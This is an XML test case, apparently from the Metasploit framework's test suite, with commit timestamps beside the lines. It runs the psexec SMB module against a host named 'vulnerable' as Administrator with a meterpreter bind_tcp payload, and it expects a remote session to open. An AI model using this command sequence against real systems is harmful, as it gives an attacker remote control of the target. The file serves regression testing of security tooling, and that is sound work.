2011-01-30 01:39:25 +00:00
|
|
|
<xml>
|
|
|
|
<msf_test>
|
|
|
|
<name>
|
|
|
|
psexec
|
|
|
|
</name>
|
|
|
|
<description>
|
|
|
|
This test runs psexec on a vulnerable host.
|
|
|
|
</description>
|
|
|
|
<commands>
|
|
|
|
use windows/smb/psexec
|
|
|
|
set WORKSPACE default
|
|
|
|
set RHOST vulnerable
|
|
|
|
set SMBUser Administrator
|
|
|
|
set SMBPass
|
|
|
|
set payload windows/meterpreter/bind_tcp
|
2011-02-09 10:26:53 +00:00
|
|
|
exploit -z
|
2011-01-30 01:39:25 +00:00
|
|
|
exit
|
|
|
|
</commands>
|
|
|
|
<output>
|
|
|
|
<successes>
|
|
|
|
<success>Meterpreter session 1 opened</success>
|
|
|
|
<success>Meterpreter session 1 closed. Reason: User exit</success>
|
|
|
|
</successes>
|
|
|
|
<failures>
|
|
|
|
</failures>
|
|
|
|
<failure_exceptions>
|
|
|
|
</failure_exceptions>
|
|
|
|
</output>
|
|
|
|
<msf_test>
|